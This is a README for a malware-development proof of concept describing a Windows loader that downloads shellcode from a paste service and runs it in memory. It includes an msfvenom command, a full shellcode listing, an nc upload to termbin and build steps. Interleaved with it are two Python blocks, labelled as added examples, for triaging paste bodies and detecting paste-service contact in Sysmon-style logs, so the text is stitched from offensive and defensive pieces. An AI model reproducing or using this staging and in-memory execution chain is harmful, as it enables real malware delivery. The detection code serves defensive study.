
crispy-calc's Introduction

POC Maldev

Disclaimer: This repository is for educational purposes only. The author is not responsible for any misuse of the information contained herein.

Description

This repository is a malware-development proof of concept: a loader that retrieves shellcode from a remote server and executes it in memory.

Requirements

Usage

Create your shellcode using msfvenom and save it in a file.

msfvenom --platform windows --arch x64  -p windows/x64/exec CMD=calc.exe -b '\x00\x0A\x0D' -f hex

After generating the shellcode in hex format, convert it into integer format: one decimal value per byte, separated by spaces. (CyberChef can do this conversion.)

Here is an example of the shellcode generated by msfvenom:

"\xeb\x27\x5b\x53\x5f\xb0\x98\xfc\xae\x75\xfd\x57\x59\x53"
"\x5e\x8a\x06\x30\x07\x48\xff\xc7\x48\xff\xc6\x66\x81\x3f"
"\x61\xde\x74\x07\x80\x3e\x98\x75\xea\xeb\xe6\xff\xe1\xe8"
"\xd4\xff\xff\xff\x10\x98\xec\x58\x93\xf4\xe0\xf8\xd0\x10"
"\x10\x10\x51\x41\x51\x40\x42\x41\x46\x58\x21\xc2\x75\x58"
"\x9b\x42\x70\x58\x9b\x42\x08\x58\x9b\x42\x30\x58\x9b\x62"
"\x40\x58\x1f\xa7\x5a\x5a\x5d\x21\xd9\x58\x21\xd0\xbc\x2c"
"\x71\x6c\x12\x3c\x30\x51\xd1\xd9\x1d\x51\x11\xd1\xf2\xfd"
"\x42\x51\x41\x58\x9b\x42\x30\x9b\x52\x2c\x58\x11\xc0\x9b"
"\x90\x98\x10\x10\x10\x58\x95\xd0\x64\x77\x58\x11\xc0\x40"
"\x9b\x58\x08\x54\x9b\x50\x30\x59\x11\xc0\xf3\x46\x58\xef"
"\xd9\x51\x9b\x24\x98\x58\x11\xc6\x5d\x21\xd9\x58\x21\xd0"
"\xbc\x51\xd1\xd9\x1d\x51\x11\xd1\x28\xf0\x65\xe1\x5c\x13"
"\x5c\x34\x18\x55\x29\xc1\x65\xc8\x48\x54\x9b\x50\x34\x59"
"\x11\xc0\x76\x51\x9b\x1c\x58\x54\x9b\x50\x0c\x59\x11\xc0"
"\x51\x9b\x14\x98\x58\x11\xc0\x51\x48\x51\x48\x4e\x49\x4a"
"\x51\x48\x51\x49\x51\x4a\x58\x93\xfc\x30\x51\x42\xef\xf0"
"\x48\x51\x49\x4a\x58\x9b\x02\xf9\x47\xef\xef\xef\x4d\x58"
"\xaa\x11\x10\x10\x10\x10\x10\x10\x10\x58\x9d\x9d\x11\x11"
"\x10\x10\x51\xaa\x21\x9b\x7f\x97\xef\xc5\xab\xe0\xa5\xb2"
"\x46\x51\xaa\xb6\x85\xad\x8d\xef\xc5\x58\x93\xd4\x38\x2c"
"\x16\x6c\x1a\x90\xeb\xf0\x65\x15\xab\x57\x03\x62\x7f\x7a"
"\x10\x49\x51\x99\xca\xef\xc5\x73\x71\x7c\x73\x3e\x75\x68"
"\x75\x10\x61\xde";

And here is the shellcode converted to integer format:

CyberChef page

235 39 91 83 95 176 152 252 174 117 253 87 89 83 94 138 6 48 7 72 255 199 72 255 198 102 129 63 97 222 116 7 128 62 152 117 234 235 230 255 225 232 212 255 255 255 16 152 236 88 147 244 224 248 208 16 16 16 81 65 81 64 66 65 70 88 33 194 117 88 155 66 112 88 155 66 8 88 155 66 48 88 155 98 64 88 31 167 90 90 93 33 217 88 33 208 188 44 113 108 18 60 48 81 209 217 29 81 17 209 242 253 66 81 65 88 155 66 48 155 82 44 88 17 192 155 144 152 16 16 16 88 149 208 100 119 88 17 192 64 155 88 8 84 155 80 48 89 17 192 243 70 88 239 217 81 155 36 152 88 17 198 93 33 217 88 33 208 188 81 209 217 29 81 17 209 40 240 101 225 92 19 92 52 24 85 41 193 101 200 72 84 155 80 52 89 17 192 118 81 155 28 88 84 155 80 12 89 17 192 81 155 20 152 88 17 192 81 72 81 72 78 73 74 81 72 81 73 81 74 88 147 252 48 81 66 239 240 72 81 73 74 88 155 2 249 71 239 239 239 77 88 170 17 16 16 16 16 16 16 16 88 157 157 17 17 16 16 81 170 33 155 127 151 239 197 171 224 165 178 70 81 170 182 133 173 141 239 197 88 147 212 56 44 22 108 26 144 235 240 101 21 171 87 3 98 127 122 16 73 81 153 202 239 197 115 113 124 115 62 117 104 117 16 97 222
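The conversion between the two listings above, and the first thing a responder does with a paste body recovered from the remote service, can be shown in a few lines. The following is an added example and not code from this repository; the byte sample it embeds is constructed filler (NOPs followed by an int3 and ret), not the page's shellcode, and the function names are this example's own.

```python
import hashlib
import re

# Constructed sample in the C-string form the README shows. These six bytes are
# harmless filler chosen for the example; they are NOT the shellcode from the page.
SAMPLE_C_LITERAL = r'''
"\x90\x90\x90\x90"
"\xcc\xc3";
'''

def parse_hex_listing(text: str) -> bytes:
    """Decode either the C-string form ("\\xeb\\x27...";) or msfvenom's plain
    `-f hex` form (eb27...). Quotes, `\\x` prefixes, semicolons and whitespace
    are stripped; anything else is rejected rather than silently skipped."""
    cleaned = re.sub(r"\\x|[\"';\s]", "", text)
    if len(cleaned) % 2 or not re.fullmatch(r"[0-9a-fA-F]*", cleaned):
        raise ValueError("input is not a hex byte listing")
    return bytes.fromhex(cleaned)

def to_decimal_listing(data: bytes) -> str:
    """The space-separated decimal form that gets uploaded to the paste service."""
    return " ".join(str(b) for b in data)

def parse_decimal_listing(text: str) -> bytes:
    """Reverse of to_decimal_listing, with a range check so a corrupted or
    tampered paste body fails loudly instead of producing garbage bytes."""
    values = [int(tok) for tok in text.split()]
    if any(v < 0 or v > 255 for v in values):
        raise ValueError("value outside the byte range 0..255")
    return bytes(values)

def triage(paste_body: str) -> dict:
    """Summary an analyst wants from a recovered paste body: decoded size,
    SHA-256 for IoC sharing, and the leading bytes as a quick prefix match."""
    data = parse_decimal_listing(paste_body)
    return {
        "size": len(data),
        "sha256": hashlib.sha256(data).hexdigest(),
        "prefix_hex": data[:4].hex(),
    }

if __name__ == "__main__":
    blob = parse_hex_listing(SAMPLE_C_LITERAL)
    listing = to_decimal_listing(blob)
    print(listing)                       # 144 144 144 144 204 195
    print(triage(listing))
```

Both parsers reject input they cannot account for; a loader that simply skips unparseable tokens would be the wrong model for triage code, where a single unexpected byte changes the hash you report.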

The next step is to upload the shellcode to a remote pastebin service. This example uses termbin, but any other service works.

cat shellcode.txt | nc termbin.com 9999

Copy the returned link and paste its host and path into the main.c file:

#define HOST L"termbin.com"
#define PATH L"/d30q"

Compile the project and run the executable.

How it works

The program uses the WinHTTP API (winhttp.dll) from the Windows API to make a GET request to the remote server. The response body is the integer listing uploaded above; it is copied into a buffer and executed in memory.
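From the defender's side, the behaviour just described leaves a small but characteristic trail: a process that is not a browser resolves and connects to a paste service, and the same process has winhttp.dll loaded because that is the fetch primitive. The detector below is an added example, not part of this repository; it runs over constructed Sysmon-style key=value lines (event IDs 22, 3 and 7 mirror Sysmon's DNS query, network connection and image load events), and the image names, PIDs and timestamps in the sample are made up for the example.

```python
import ntpath
import re
from collections import defaultdict

# Paste services worth watching; termbin.com is the one the README stages from.
PASTE_SERVICES = {"termbin.com", "pastebin.com"}
# Browsers legitimately talk to paste sites; everything else is suspect.
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe"}

# Constructed telemetry (not from any real host). Paths use Windows separators.
SAMPLE_EVENTS = r"""
10:00:01 EventID=22 Image=C:\Program Files\Mozilla Firefox\firefox.exe ProcessId=4120 QueryName=termbin.com
10:00:02 EventID=3 Image=C:\Program Files\Mozilla Firefox\firefox.exe ProcessId=4120 DestinationHostname=termbin.com DestinationPort=443
10:00:04 EventID=7 Image=C:\Windows\System32\svchost.exe ProcessId=900 ImageLoaded=C:\Windows\System32\winhttp.dll
10:00:05 EventID=7 Image=C:\Users\dev\build\poc-loader.exe ProcessId=5588 ImageLoaded=C:\Windows\System32\winhttp.dll
10:00:06 EventID=22 Image=C:\Users\dev\build\poc-loader.exe ProcessId=5588 QueryName=termbin.com
10:00:07 EventID=3 Image=C:\Users\dev\build\poc-loader.exe ProcessId=5588 DestinationHostname=termbin.com DestinationPort=80
10:00:09 EventID=3 Image=C:\Windows\System32\svchost.exe ProcessId=900 DestinationHostname=update.microsoft.com DestinationPort=443
"""

# key=value pairs where a value may contain spaces (e.g. "Program Files");
# a value ends right before the next " key=".
KV = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")

def parse_event(line: str) -> dict:
    fields = dict(KV.findall(line))
    fields["Timestamp"] = line.split()[0]
    return fields

def base_name(path: str) -> str:
    return ntpath.basename(path).lower()

def detect(log_text: str) -> list:
    """Return one alert per process that contacted a paste service without
    being a browser. Loading winhttp.dll alone is not flagged (svchost above);
    it only raises severity when combined with the paste-service contact."""
    per_pid = defaultdict(lambda: {"image": None, "domains": set(),
                                   "winhttp": False, "first_seen": None})
    for line in log_text.strip().splitlines():
        ev = parse_event(line)
        if "ProcessId" not in ev:
            continue
        st = per_pid[ev["ProcessId"]]
        st["image"] = ev["Image"]
        st["first_seen"] = st["first_seen"] or ev["Timestamp"]
        eid = ev["EventID"]
        if eid == "22" and ev.get("QueryName") in PASTE_SERVICES:
            st["domains"].add(ev["QueryName"])
        elif eid == "3" and ev.get("DestinationHostname") in PASTE_SERVICES:
            st["domains"].add(ev["DestinationHostname"])
        elif eid == "7" and base_name(ev.get("ImageLoaded", "")) == "winhttp.dll":
            st["winhttp"] = True

    alerts = []
    for pid, st in per_pid.items():
        if not st["domains"] or base_name(st["image"]) in BROWSERS:
            continue
        alerts.append({
            "pid": pid,
            "image": st["image"],
            "domains": sorted(st["domains"]),
            "severity": "high" if st["winhttp"] else "medium",
            "first_seen": st["first_seen"],
        })
    return sorted(alerts, key=lambda a: a["first_seen"])

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The allowlist is the weak point of this rule: it is keyed on the image name only, so in production it should be paired with signer or path checks, and the paste-service list should come from threat intelligence rather than a hard-coded set.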

Compiling

mkdir build
cd build
cmake .. -G "MinGW Makefiles"   # generates the Makefiles; needs CMake and a MinGW-w64 toolchain
cmake --build .                 # runs the generated build and produces the executable

References
